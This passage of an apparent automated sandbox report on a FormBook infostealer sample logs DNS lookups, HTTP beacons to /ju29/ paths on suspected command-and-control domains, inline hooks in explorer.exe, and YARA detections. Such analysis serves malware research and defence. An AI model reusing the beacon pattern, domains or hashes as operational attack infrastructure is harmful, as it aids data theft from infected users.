Nov 3, 2023 12:37:09.932394981 CET	80	49718	75.2.115.196	192.168.2.7
Nov 3, 2023 12:37:09.932506084 CET	49718	80	192.168.2.7	75.2.115.196
Nov 3, 2023 12:37:09.932625055 CET	49718	80	192.168.2.7	75.2.115.196
Nov 3, 2023 12:37:09.945883989 CET	80	49718	75.2.115.196	192.168.2.7
Nov 3, 2023 12:37:09.945952892 CET	49718	80	192.168.2.7	75.2.115.196
Nov 3, 2023 12:37:10.025494099 CET	80	49718	75.2.115.196	192.168.2.7
Nov 3, 2023 12:37:29.948903084 CET	49719	80	192.168.2.7	103.224.212.216
Nov 3, 2023 12:37:30.104263067 CET	80	49719	103.224.212.216	192.168.2.7
Nov 3, 2023 12:37:30.104367018 CET	49719	80	192.168.2.7	103.224.212.216
Nov 3, 2023 12:37:30.104631901 CET	49719	80	192.168.2.7	103.224.212.216
Nov 3, 2023 12:37:30.272778988 CET	80	49719	103.224.212.216	192.168.2.7
Nov 3, 2023 12:37:30.272846937 CET	80	49719	103.224.212.216	192.168.2.7
Nov 3, 2023 12:37:30.272969007 CET	49719	80	192.168.2.7	103.224.212.216
Nov 3, 2023 12:37:30.276887894 CET	49719	80	192.168.2.7	103.224.212.216
Nov 3, 2023 12:37:30.432271004 CET	80	49719	103.224.212.216	192.168.2.7
Nov 3, 2023 12:38:11.668055058 CET	49727	80	192.168.2.7	3.33.130.190
Nov 3, 2023 12:38:11.760113955 CET	80	49727	3.33.130.190	192.168.2.7
Nov 3, 2023 12:38:11.760304928 CET	49727	80	192.168.2.7	3.33.130.190
Nov 3, 2023 12:38:11.760375023 CET	49727	80	192.168.2.7	3.33.130.190
Nov 3, 2023 12:38:11.852693081 CET	80	49727	3.33.130.190	192.168.2.7
Nov 3, 2023 12:38:11.865736961 CET	80	49727	3.33.130.190	192.168.2.7
Nov 3, 2023 12:38:11.865767002 CET	80	49727	3.33.130.190	192.168.2.7
Nov 3, 2023 12:38:11.865871906 CET	49727	80	192.168.2.7	3.33.130.190
Nov 3, 2023 12:38:11.865930080 CET	49727	80	192.168.2.7	3.33.130.190
Nov 3, 2023 12:38:11.880346060 CET	80	49727	3.33.130.190	192.168.2.7
Nov 3, 2023 12:38:11.880444050 CET	49727	80	192.168.2.7	3.33.130.190
Nov 3, 2023 12:38:11.958362103 CET	80	49727	3.33.130.190	192.168.2.7
Nov 3, 2023 12:38:32.073185921 CET	49729	80	192.168.2.7	34.149.87.45
Nov 3, 2023 12:38:32.172116995 CET	80	49729	34.149.87.45	192.168.2.7
Nov 3, 2023 12:38:32.172210932 CET	49729	80	192.168.2.7	34.149.87.45
Nov 3, 2023 12:38:32.172303915 CET	49729	80	192.168.2.7	34.149.87.45
Nov 3, 2023 12:38:32.269622087 CET	80	49729	34.149.87.45	192.168.2.7
Nov 3, 2023 12:38:32.290714979 CET	80	49729	34.149.87.45	192.168.2.7
Nov 3, 2023 12:38:32.290729046 CET	80	49729	34.149.87.45	192.168.2.7
Nov 3, 2023 12:38:32.290834904 CET	49729	80	192.168.2.7	34.149.87.45
Nov 3, 2023 12:38:32.290904999 CET	49729	80	192.168.2.7	34.149.87.45
Nov 3, 2023 12:38:32.388066053 CET	80	49729	34.149.87.45	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 3, 2023 12:35:07.288681030 CET	57008	53	192.168.2.7	1.1.1.1
Nov 3, 2023 12:35:07.387788057 CET	53	57008	1.1.1.1	192.168.2.7
Nov 3, 2023 12:35:29.644649982 CET	59696	53	192.168.2.7	1.1.1.1
Nov 3, 2023 12:35:29.742508888 CET	53	59696	1.1.1.1	192.168.2.7
Nov 3, 2023 12:35:30.431287050 CET	57744	53	192.168.2.7	1.1.1.1
Nov 3, 2023 12:35:30.821049929 CET	53	57744	1.1.1.1	192.168.2.7
Nov 3, 2023 12:35:48.178874016 CET	51792	53	192.168.2.7	1.1.1.1
Nov 3, 2023 12:35:48.532627106 CET	53	51792	1.1.1.1	192.168.2.7
Nov 3, 2023 12:36:08.162393093 CET	55930	53	192.168.2.7	1.1.1.1
Nov 3, 2023 12:36:08.266604900 CET	53	55930	1.1.1.1	192.168.2.7
Nov 3, 2023 12:36:28.272099972 CET	49705	53	192.168.2.7	1.1.1.1
Nov 3, 2023 12:36:28.797101974 CET	53	49705	1.1.1.1	192.168.2.7
Nov 3, 2023 12:36:48.850645065 CET	49225	53	192.168.2.7	1.1.1.1
Nov 3, 2023 12:36:49.489738941 CET	53	49225	1.1.1.1	192.168.2.7
Nov 3, 2023 12:37:09.240822077 CET	52866	53	192.168.2.7	1.1.1.1
Nov 3, 2023 12:37:09.418509960 CET	53	52866	1.1.1.1	192.168.2.7
Nov 3, 2023 12:37:29.646694899 CET	55630	53	192.168.2.7	1.1.1.1
Nov 3, 2023 12:37:29.944287062 CET	53	55630	1.1.1.1	192.168.2.7
Nov 3, 2023 12:37:50.961755991 CET	61824	53	192.168.2.7	1.1.1.1
Nov 3, 2023 12:37:51.314821005 CET	53	61824	1.1.1.1	192.168.2.7
Nov 3, 2023 12:38:11.506860971 CET	51325	53	192.168.2.7	1.1.1.1
Nov 3, 2023 12:38:11.666805029 CET	53	51325	1.1.1.1	192.168.2.7
Nov 3, 2023 12:38:31.953860998 CET	51863	53	192.168.2.7	1.1.1.1
Nov 3, 2023 12:38:32.072005987 CET	53	51863	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 3, 2023 12:35:07.288681030 CET	192.168.2.7	1.1.1.1	0x455a	Standard query (0)	www.klxcv.xyz	A (IP address)	IN (0x0001)	false
Nov 3, 2023 12:35:29.644649982 CET	192.168.2.7	1.1.1.1	0x1ef5	Standard query (0)	www.klxcv.xyz	A (IP address)	IN (0x0001)	false
Nov 3, 2023 12:35:30.431287050 CET	192.168.2.7	1.1.1.1	0xed4f	Standard query (0)	www.xuangesmd.com	A (IP address)	IN (0x0001)	false
Nov 3, 2023 12:35:48.178874016 CET	192.168.2.7	1.1.1.1	0x4092	Standard query (0)	www.e9pf4s.top	A (IP address)	IN (0x0001)	false
Nov 3, 2023 12:36:08.162393093 CET	192.168.2.7	1.1.1.1	0xb56b	Standard query (0)	www.townstart.shop	A (IP address)	IN (0x0001)	false
Nov 3, 2023 12:36:28.272099972 CET	192.168.2.7	1.1.1.1	0x6752	Standard query (0)	www.gaming-chairs-vn-vi-2885437.fyi	A (IP address)	IN (0x0001)	false
Nov 3, 2023 12:36:48.850645065 CET	192.168.2.7	1.1.1.1	0x859e	Standard query (0)	www.sklm888.com	A (IP address)	IN (0x0001)	false
Nov 3, 2023 12:37:09.240822077 CET	192.168.2.7	1.1.1.1	0x8164	Standard query (0)	www.wokeeducationhateskids.com	A (IP address)	IN (0x0001)	false
Nov 3, 2023 12:37:29.646694899 CET	192.168.2.7	1.1.1.1	0xaf84	Standard query (0)	www.umertazkeer.com	A (IP address)	IN (0x0001)	false
Nov 3, 2023 12:37:50.961755991 CET	192.168.2.7	1.1.1.1	0xcf02	Standard query (0)	www.mzfgwh.top	A (IP address)	IN (0x0001)	false
Nov 3, 2023 12:38:11.506860971 CET	192.168.2.7	1.1.1.1	0x3f22	Standard query (0)	www.glocraze.com	A (IP address)	IN (0x0001)	false
Nov 3, 2023 12:38:31.953860998 CET	192.168.2.7	1.1.1.1	0xadeb	Standard query (0)	www.durufilmyapim.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 3, 2023 12:35:07.387788057 CET	1.1.1.1	192.168.2.7	0x455a	No error (0)	www.klxcv.xyz		198.177.124.40	A (IP address)	IN (0x0001)	false
Nov 3, 2023 12:35:29.742508888 CET	1.1.1.1	192.168.2.7	0x1ef5	No error (0)	www.klxcv.xyz		198.177.124.40	A (IP address)	IN (0x0001)	false
Nov 3, 2023 12:35:30.821049929 CET	1.1.1.1	192.168.2.7	0xed4f	No error (0)	www.xuangesmd.com		154.17.26.8	A (IP address)	IN (0x0001)	false
Nov 3, 2023 12:35:48.532627106 CET	1.1.1.1	192.168.2.7	0x4092	Name error (3)	www.e9pf4s.top	none	none	A (IP address)	IN (0x0001)	false
Nov 3, 2023 12:36:08.266604900 CET	1.1.1.1	192.168.2.7	0xb56b	Name error (3)	www.townstart.shop	none	none	A (IP address)	IN (0x0001)	false
Nov 3, 2023 12:36:28.797101974 CET	1.1.1.1	192.168.2.7	0x6752	No error (0)	www.gaming-chairs-vn-vi-2885437.fyi	ssl1.prod.systemdragon.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 3, 2023 12:36:28.797101974 CET	1.1.1.1	192.168.2.7	0x6752	No error (0)	ssl1.prod.systemdragon.com		104.17.158.1	A (IP address)	IN (0x0001)	false
Nov 3, 2023 12:36:28.797101974 CET	1.1.1.1	192.168.2.7	0x6752	No error (0)	ssl1.prod.systemdragon.com		104.17.157.1	A (IP address)	IN (0x0001)	false
Nov 3, 2023 12:36:49.489738941 CET	1.1.1.1	192.168.2.7	0x859e	No error (0)	www.sklm888.com		108.186.24.175	A (IP address)	IN (0x0001)	false
Nov 3, 2023 12:37:09.418509960 CET	1.1.1.1	192.168.2.7	0x8164	No error (0)	www.wokeeducationhateskids.com		75.2.115.196	A (IP address)	IN (0x0001)	false
Nov 3, 2023 12:37:29.944287062 CET	1.1.1.1	192.168.2.7	0xaf84	No error (0)	www.umertazkeer.com		103.224.212.216	A (IP address)	IN (0x0001)	false
Nov 3, 2023 12:37:51.314821005 CET	1.1.1.1	192.168.2.7	0xcf02	Name error (3)	www.mzfgwh.top	none	none	A (IP address)	IN (0x0001)	false
Nov 3, 2023 12:38:11.666805029 CET	1.1.1.1	192.168.2.7	0x3f22	No error (0)	www.glocraze.com	glocraze.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 3, 2023 12:38:11.666805029 CET	1.1.1.1	192.168.2.7	0x3f22	No error (0)	glocraze.com		3.33.130.190	A (IP address)	IN (0x0001)	false
Nov 3, 2023 12:38:11.666805029 CET	1.1.1.1	192.168.2.7	0x3f22	No error (0)	glocraze.com		15.197.148.33	A (IP address)	IN (0x0001)	false
Nov 3, 2023 12:38:32.072005987 CET	1.1.1.1	192.168.2.7	0xadeb	No error (0)	www.durufilmyapim.com	cdn1.wixdns.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 3, 2023 12:38:32.072005987 CET	1.1.1.1	192.168.2.7	0xadeb	No error (0)	cdn1.wixdns.net	td-ccm-neg-87-45.wixdns.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 3, 2023 12:38:32.072005987 CET	1.1.1.1	192.168.2.7	0xadeb	No error (0)	td-ccm-neg-87-45.wixdns.net		34.149.87.45	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.gaming-chairs-vn-vi-2885437.fyi

www.sklm888.com

www.wokeeducationhateskids.com

www.umertazkeer.com

www.glocraze.com

www.durufilmyapim.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.7	49716	104.17.158.1	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2023 12:36:28.890687943 CET	115	OUT	GET /ju29/?M2Mp=6lX0R0Q&Bb_=jZmXybDTEhqhfjbWt8DWyZKNvc7QdVfFN8RblV5F5bs2BRUWluOZEJKJ+J3f2kZBRyfQB9gctA== HTTP/1.1 Host: www.gaming-chairs-vn-vi-2885437.fyi Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 3, 2023 12:36:28.985057116 CET	116	IN	HTTP/1.1 409 Conflict Date: Fri, 03 Nov 2023 11:36:28 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 16 Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 820451dcc9c27ff9-IAD Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 30 31 Data Ascii: error code: 1001

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.7	49717	108.186.24.175	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2023 12:36:49.663320065 CET	117	OUT	GET /ju29/?Bb_=n8Crfq9d8L0uMe2mi2N2bIuprmrMns3qA2Eid6rDPq5MkWbkjsGFJF992xVz/9ETWq9TUrQEIA==&M2Mp=6lX0R0Q HTTP/1.1 Host: www.sklm888.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 3, 2023 12:36:49.836610079 CET	118	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 03 Nov 2023 11:36:31 GMT Content-Type: text/html Content-Length: 789 Connection: close Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e ce e4 d2 c4 c9 bd d7 d9 cb be b5 e7 d7 d3 bf c6 bc bc d3 d0 cf de b9 ab cb be 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 20 20 20 20 76 61 72 20 62 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0d 0a 20 20 20 20 76 61 72 20 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2e 73 70 6c 69 74 28 27 3a 27 29 5b 30 5d 3b 0d 0a 20 20 20 20 69 66 20 28 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 3d 3d 20 27 68 74 74 70 73 27 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 73 3a 2f 2f 7a 7a 2e 62 64 73 74 61 74 69 63 2e 63 6f 6d 2f 6c 69 6e 6b 73 75 62 6d 69 74 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 65 6c 73 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 3a 2f 2f 70 75 73 68 2e 7a 68 61 6e 7a 68 61 6e 67 2e 62 61 69 64 75 2e 63 6f 6d 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 0d 0a 20 20 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 62 70 2c 20 73 29 3b 0d 0a 7d 29 28 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 63 6f 6d 6d 6f 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 74 6a 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);})();</script></head><script language="javascript" type="text/javascript" src="/common.js"></script><script language="javascript" type="text/javascript" src="/tj.js"></script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.7	49718	75.2.115.196	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2023 12:37:09.512099028 CET	119	OUT	GET /ju29/?M2Mp=6lX0R0Q&Bb_=9Lm8jqPme8OjdFMw6eGY6bGRl079o6M7fF/LdPaGLMmXDMBCcOms1FNC+m6WNGhZ2iLvmxSXpQ== HTTP/1.1 Host: www.wokeeducationhateskids.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 3, 2023 12:37:09.932372093 CET	120	IN	HTTP/1.1 403 Forbidden Date: Fri, 03 Nov 2023 11:37:09 GMT Content-Type: text/html Content-Length: 146 Connection: close Server: nginx Vary: Accept-Encoding Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.7	49719	103.224.212.216	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2023 12:37:30.104631901 CET	120	OUT	GET /ju29/?Bb_=qL/w1+NyuWgJ0bdil4hFQmgMppJTUe9u/d2a0uQzQpF5pPc2wY/Xb3Z/xNefSsFgsh4j65y1Iw==&M2Mp=6lX0R0Q HTTP/1.1 Host: www.umertazkeer.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 3, 2023 12:37:30.272778988 CET	121	IN	HTTP/1.1 302 Found date: Fri, 03 Nov 2023 11:37:30 GMT server: Apache set-cookie: __tad=1699011450.1255716; expires=Mon, 31-Oct-2033 11:37:30 GMT; Max-Age=315360000 location: http://ww25.umertazkeer.com/ju29/?Bb_=qL/w1+NyuWgJ0bdil4hFQmgMppJTUe9u/d2a0uQzQpF5pPc2wY/Xb3Z/xNefSsFgsh4j65y1Iw==&M2Mp=6lX0R0Q&subid1=20231103-2237-3076-ba67-d1f6c141f914 content-length: 2 content-type: text/html; charset=UTF-8 connection: close Data Raw: 0a 0a Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.7	49727	3.33.130.190	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2023 12:38:11.760375023 CET	169	OUT	GET /ju29/?Bb_=gDkZXs6+uubhkTTBwUg7wBT+4b2V8qQlIvdPiiNfmflrZ9ZAj1bLhBmsLpsiQ7EDnpvm500CUg==&M2Mp=6lX0R0Q HTTP/1.1 Host: www.glocraze.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 3, 2023 12:38:11.865736961 CET	170	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Fri, 03 Nov 2023 11:38:11 GMT Content-Type: text/html Content-Length: 291 Connection: close ETag: "65271109-123" Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.7	49729	34.149.87.45	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2023 12:38:32.172303915 CET	176	OUT	GET /ju29/?M2Mp=6lX0R0Q&Bb_=4V5Ap+fQ4NIPSmUR7w8IZjRflmo1SlImCs0PelLViRgAq2SQgX/qLJiweWaWTZxUZ6zbHBn8KA== HTTP/1.1 Host: www.durufilmyapim.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 3, 2023 12:38:32.290714979 CET	177	IN	HTTP/1.1 429 Too Many Requests Content-Length: 0 Accept-Ranges: bytes Date: Fri, 03 Nov 2023 11:38:32 GMT X-Served-By: cache-iad-kiad7000120-IAD X-Cache: MISS X-Seen-By: yvSunuo/8ld62ehjr5B7kA== Via: 1.1 google Connection: close

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x83 0x3E 0xE8
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x8B 0xBE 0xE8
GetMessageW	INLINE	0x48 0x8B 0xB8 0x8B 0xBE 0xE8
GetMessageA	INLINE	0x48 0x8B 0xB8 0x83 0x3E 0xE8

Target ID:	0
Start time:	12:34:30
Start date:	03/11/2023
Path:	C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe
Imagebase:	0x400000
File size:	420'368 bytes
MD5 hash:	0C57A7AAE080FD2EAC42A31FA5B7F051
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	12:34:30
Start date:	03/11/2023
Path:	C:\Users\user\AppData\Local\Temp\xheuzyg.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe"
Imagebase:	0x1a0000
File size:	245'248 bytes
MD5 hash:	25D54D83B6D68CAF9DE7655FF5E33651
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.1230578610.0000000002F50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1230578610.0000000002F50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1230578610.0000000002F50000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.1230578610.0000000002F50000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.1230578610.0000000002F50000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_NSISDropper, Description: Yara detected NSISDropper, Source: 00000002.00000002.1230484201.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 58%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	12:34:30
Start date:	03/11/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	12:34:31
Start date:	03/11/2023
Path:	C:\Users\user\AppData\Local\Temp\xheuzyg.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe
Imagebase:	0x1a0000
File size:	245'248 bytes
MD5 hash:	25D54D83B6D68CAF9DE7655FF5E33651
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.1285843211.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1285843211.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1285843211.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.1285843211.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.1285843211.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.1285810660.0000000001090000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1285810660.0000000001090000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1285810660.0000000001090000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.1285810660.0000000001090000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.1285810660.0000000001090000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	12:34:32
Start date:	03/11/2023
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff70ffd0000
File size:	5'141'208 bytes
